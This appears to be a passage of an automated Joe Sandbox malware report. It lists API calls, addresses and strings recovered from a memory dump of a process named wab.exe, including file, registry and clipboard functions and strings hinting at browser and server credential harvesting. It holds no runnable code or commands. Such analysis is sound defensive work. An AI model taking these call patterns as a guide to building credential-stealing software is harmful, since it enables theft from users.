                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$PointerRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 3154509469-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4232544981-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$FileModuleName
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859505661-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3934441357-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnumNamesResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 3334572018-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseFind
                                                                                                                • String ID:
                                                                                                                • API String ID: 1863332320-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Open
                                                                                                                • String ID:
                                                                                                                • API String ID: 71445658-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004095FC
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                  • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                                                                  • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3655998216-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00445426
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 1828521557-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 2081463915-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2136311172-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1936579350-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                • GetLastError.KERNEL32 ref: 00409974
                                                                                                                • CloseClipboard.USER32 ref: 0040997D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                • String ID:
                                                                                                                • API String ID: 2565263379-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                • API String ID: 2780580303-317687271
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • EmptyClipboard.USER32 ref: 00409882
                                                                                                                • wcslen.MSVCRT ref: 0040988F
                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                                                                                • memcpy.MSVCRT ref: 004098B5
                                                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                • CloseClipboard.USER32 ref: 004098D7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2014503067-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                                                                • String ID: OsError 0x%x (%u)
                                                                                                                • API String ID: 403622227-2664311388
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                • OpenClipboard.USER32(?), ref: 00411878
                                                                                                                • GetLastError.KERNEL32 ref: 0041188D
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 004118AC
                                                                                                                  • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                                  • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                  • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                  • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                                                  • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                  • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                                                  • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                  • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                  • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                                                                                                                • String ID:
                                                                                                                • API String ID: 1203541146-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Version
                                                                                                                • String ID:
                                                                                                                • API String ID: 1889659487-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                • memset.MSVCRT ref: 0040265F
                                                                                                                • memcpy.MSVCRT ref: 0040269B
                                                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                • memcpy.MSVCRT ref: 004026FF
                                                                                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                • API String ID: 577499730-1134094380
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                • String ID: :stringdata$ftp://$http://$https://
                                                                                                                • API String ID: 2787044678-1921111777
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                • GetDC.USER32 ref: 004140E3
                                                                                                                • wcslen.MSVCRT ref: 00414123
                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                • _snwprintf.MSVCRT ref: 00414244
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
